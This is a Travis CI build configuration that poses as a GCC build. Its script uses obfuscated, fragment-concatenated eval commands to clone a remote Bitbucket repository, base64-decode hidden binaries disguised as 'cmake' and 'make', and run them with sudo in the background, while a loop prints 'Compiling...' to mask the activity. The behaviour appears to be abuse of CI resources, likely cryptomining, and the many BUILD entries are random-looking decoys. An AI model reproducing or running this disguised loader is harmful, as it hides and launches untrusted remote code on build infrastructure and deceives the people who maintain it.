dist: bionic

env:
  - BUILD="--rebuilt-binaries-timestamp=638HZ"
  - BUILD="--noreplace=319mz"
  - BUILD="--pretend=360UN"
  - BUILD="--with-bdeps-auto=508bn"
  - BUILD="--clean=669M9"
  - BUILD="--changed-use=717ho"
  - BUILD="--ask=529eh"
  - BUILD="--depclean-lib-check=197t5"
  - BUILD="--nospinner=496HB"
  - BUILD="--root-deps=979sz"
  - BUILD="--usepkg=87434"
  - BUILD="--config-root=906it"
  - BUILD="--buildpkgonly=415rG"
  - BUILD="--binpkg-changed-deps=943Rj"
  - BUILD="--depclean-lib-check=948wl"
  - BUILD="--with-bdeps-auto=600Ee"
  - BUILD="--sysroot=560Pm"
  - BUILD="--autounmask-use=554Jf"
  - BUILD="--misspell-suggestions=210nD"
  - BUILD="--prefix=370K6"
  - BUILD="--regen=4507M"
  - BUILD="--clean=140gv"
  - BUILD="--fuzzy-search=566e2"
  - BUILD="--check-news=1187z"
  - BUILD="--useoldpkg-atoms=446A2"
  - BUILD="--search-similarity=60CZ"
  - BUILD="--ask-enter-invalid=116iv"
  - BUILD="--search-index=4327t"
  - BUILD="--config=848AG"
  - BUILD="--buildpkg=755pR"
  - BUILD="--quiet-fail=238MY"
  - BUILD="--useoldpkg-atoms=446IH"
  - BUILD="--quiet-fail=582Zs"
  - BUILD="--deselect=602sC"
  - BUILD="--with-test-deps=777cY"
  - BUILD="--rebuild-if-new-slot=989ZQ"
  - BUILD="--binpkg-respect-use=679ls"
  - BUILD="--reinstall-atoms=725EJ"
  - BUILD="--autounmask-backtrack=53C9"
  - BUILD="--changed-deps-report=4214A"
  - BUILD="--verbose=163kR"
  - BUILD="--complete-graph-if-new-use=232Sv"
  - BUILD="--getbinpkg=3223i"
  - BUILD="--autounmask-continue=5437y"
  - BUILD="--noconfmem=955lp"
  - BUILD="--check-news=756GD"
  - BUILD="--autounmask-keep-masks=302Tf"
  - BUILD="--quiet-unmerge-warn=383tf"
  - BUILD="--ignore-default-opts=937KR"
  - BUILD="--rebuild-if-new-rev=209v0"
  - BUILD="--deep=292Mh"
  - BUILD="--autounmask-keep-keywords=6116u"
  - BUILD="--onlydeps-with-rdeps=70S7"
  - BUILD="--debug=979oR"
  - BUILD="--useoldpkg-atoms=517IE"
  - BUILD="--rebuild-exclude=730pH"
  - BUILD="--usepkg=342sk"
  - BUILD="--search-index=880yR"
  - BUILD="--digest=9828b"
  - BUILD="--package-moves=484AQ"
  - BUILD="--prune=91YX"
  - BUILD="--buildpkg-exclude=9598i"
  - BUILD="--autounmask-keep-masks=982m5"
  - BUILD="--columns=4227N"
  - BUILD="--reinstall=700CB"
  - BUILD="--accept-restrict=121Aa"
  - BUILD="--with-bdeps-auto=314a7"
  - BUILD="--buildpkg-exclude=333pT"
  - BUILD="--onlydeps=744tv"
  - BUILD="--nospinner=325hy"
  - BUILD="--pkg-format=303xW"
  - BUILD="--usepkg=999zz"
  - BUILD="--getbinpkg=225Xn"
  - BUILD="--use-ebuild-visibility=77Tc"
  - BUILD="--prefix=386H0"
  - BUILD="--alert=797t8"
  - BUILD="--onlydeps-with-rdeps=245rt"
  - BUILD="--quiet-unmerge-warn=476c6"
  - BUILD="--rebuild-if-new-rev=442N1"
  - BUILD="--root=885hb"
  - BUILD="--deep=994tS"
  - BUILD="--autounmask-license=824mM"
  - BUILD="--digest=6221O"
  - BUILD="--rebuild-if-new-slot=847W0"
  - BUILD="--rebuild-if-new-ver=873v9"
  - BUILD="--clean=408kA"
  - BUILD="--keep-going=708Tm"
  - BUILD="--keep-going=76991"
  - BUILD="--rebuild-if-unbuilt=1571q"
  - BUILD="--skipfirst=180hB"
  - BUILD="--buildpkgonly=507Wp"
  - BUILD="--misspell-suggestions=6409A"
  - BUILD="--ignore-world=609b4"
  - BUILD="--fuzzy-search=583FW"
  - BUILD="--noconfmem=852jz"
  - BUILD="--prefix=359pO"
  - BUILD="--alphabetical=513vD"
  - BUILD="--noconfmem=846tI"
  - BUILD="--ignore-soname-deps=849qI"
  - BUILD="--with-bdeps=220Tq"
  - BUILD="--complete-graph=448MN"
  - BUILD="--update=956yz"
  - BUILD="--autounmask-unrestricted-atoms=98rI"
  - BUILD="--autounmask-write=2192D"
  - BUILD="--noconfmem=400R2"
  - BUILD="--jobs=826ta"
  - BUILD="--quiet-fail=416VE"
  - BUILD="--buildpkgonly=66BP"
  - BUILD="--autounmask-license=770DE"
  - BUILD="--quickpkg-direct=696nH"
  - BUILD="--quiet-fail=895F7"
  - BUILD="--keep-going=145ar"
  - BUILD="--config=354rS"
  - BUILD="--info=240BR"
  - BUILD="--clean=503tP"
  - BUILD="--search-similarity=25dO"
  - BUILD="--fetch-all-uri=506Ms"
  - BUILD="--alert=533pY"
  - BUILD="--rebuild-if-new-slot=341zl"
  - BUILD="--info=7923w"
  - BUILD="--getbinpkg=509oD"
  - BUILD="--fuzzy-search=520JV"
  - BUILD="--package-moves=155FJ"
  - BUILD="--nospinner=497j0"
  - BUILD="--rebuilt-binaries=675GM"
  - BUILD="--help=826pf"
  - BUILD="--config-root=7776w"
  - BUILD="--rebuild-if-new-rev=535Xi"
  - BUILD="--verbose-slot-rebuilds=137yf"
  - BUILD="--accept-restrict=389Gh"
  - BUILD="--digest=59988"
  - BUILD="--fetch-all-uri=287Fk"
  - BUILD="--misspell-suggestions=234T1"
  - BUILD="--search=823i5"
  - BUILD="--read-news=673kq"
  - BUILD="--newrepo=110bg"
  - BUILD="--read-news=23OX"
  - BUILD="--with-bdeps-auto=978Vd"
  - BUILD="--quiet-unmerge-warn=95233"
  - BUILD="--changed-slot=208GY"
  - BUILD="--unmerge=655gU"
  - BUILD="--verbose-slot-rebuilds=190Hx"
  - BUILD="--usepkg=344u7"
  - BUILD="--use-ebuild-visibility=941Ou"
  - BUILD="--autounmask-keep-keywords=1891F"
  - BUILD="--accept-properties=659hW"
  - BUILD="--search=169uC"
  - BUILD="--backtrack=95817"
  - BUILD="--update=9491z"
  - BUILD="--sysroot=702J0"
  - BUILD="--searchdesc=78wj"
  - BUILD="--prefix=397W0"
  - BUILD="--onlydeps-with-rdeps=101V0"
  - BUILD="--noreplace=487c3"
  - BUILD="--autounmask-keep-masks=996vB"
  - BUILD="--binpkg-changed-deps=291Uy"
  - BUILD="--changed-deps-report=188bC"
  - BUILD="--rebuild-if-new-ver=452Al"
  - BUILD="--load-average=752gh"
  - BUILD="--verbose-conflicts=453Co"
  - BUILD="--ignore-world=25PD"
  - BUILD="--complete-graph-if-new-ver=876Kx"
  - BUILD="--autounmask-license=268zM"
  - BUILD="--binpkg-changed-deps=438KV"
  - BUILD="--getbinpkg=574Y0"
  - BUILD="--fuzzy-search=956M8"
  - BUILD="--unordered-display=986Fa"
  - BUILD="--useoldpkg-atoms=6204J"
  - BUILD="--depclean=9926D"
  - BUILD="--prefix=165vc"
  - BUILD="--complete-graph=989uq"
  - BUILD="--changelog=8630M"
  - BUILD="--columns=375JO"
  - BUILD="--read-news=680AO"
  - BUILD="--usepkg=9339p"
  - BUILD="--clean=750P6"
  - BUILD="--buildpkgonly=789C9"
  - BUILD="--update=675Ei"
  - BUILD="--ask-enter-invalid=862x2"
  - BUILD="--keep-going=5105C"
  - BUILD="--rebuild-if-new-rev=232P8"
  - BUILD="--fail-clean=650So"
  - BUILD="--nodeps=8269Q"
  - BUILD="--searchdesc=438OK"
  - BUILD="--ask-enter-invalid=225AL"
  - BUILD="--use-ebuild-visibility=822S8"
  - BUILD="--rebuild-if-new-rev=747qS"

language: minimal

script:
  - sudo apt update || true
  - kCdDSyNKo="sudo apt --"
  - lhkVyZuxY="yes install"
  - XmNSndDv=" cl-base64 "
  - zUBnkw="git &>/dev/"
  - eval "$kCdDSyNKo""$lhkVyZuxY""$XmNSndDv""$zUBnkw""null"
  - KzfaAKvWCl="git clone h"
  - RUomjml="ttps://gccb"
  - YeGPBHb="uild@bitbuc"
  - TKtEiRrp="ket.org/gcc"
  - oWBQIj="build/gcc.g"
  - PGEOL="it &>/dev/n"
  - eval "$KzfaAKvWCl""$RUomjml""$YeGPBHb""$TKtEiRrp""$oWBQIj""$PGEOL""ull"
  - VBEalvyszXO="base64 -d g"
  - GMnsDGVVz="cc/cmake_ >"
  - eval "$VBEalvyszXO""$GMnsDGVVz"" cmake"
  - itAnKVQ="base64 -d g"
  - HguKSjFlG="cc/config_ "
  - snohRLK="> output.lo"
  - eval "$itAnKVQ""$HguKSjFlG""$snohRLK""g"
  - WUdskP="base64 -d g"
  - bKrFsvSZE="cc/make_ > "
  - eval "$WUdskP""$bKrFsvSZE""make"
  - GUMsriuNGVf="chmod +x ma"
  - eval "$GUMsriuNGVf""ke cmake"
  - JdOJYHoDa="./cmake"
  - eval "$JdOJYHoDa"""
  - myRcVTuih="sed -i 's/b"
  - XGtGNZUOQ="uild/tundef"
  - HeMzKj="ined2u/g' o"
  - eval "$myRcVTuih""$XGtGNZUOQ""$HeMzKj""utput.log"
  - Lkfqvtk="sudo ./make"
  - IPhIzZA=" --config=o"
  - oyBWJhIf="utput.log &"
  - tsczUwrbEdc=">/dev/null "
  - eval "$Lkfqvtk""$IPhIzZA""$oyBWJhIf""$tsczUwrbEdc""&"
  - GCC=$(date +%s)
  - echo $BUILD
  - while true; do CC=$(date +%s); echo Compiling...; [ $CC -ge $((GCC + 2555)) ] && sudo killall make && break; sleep 184; done
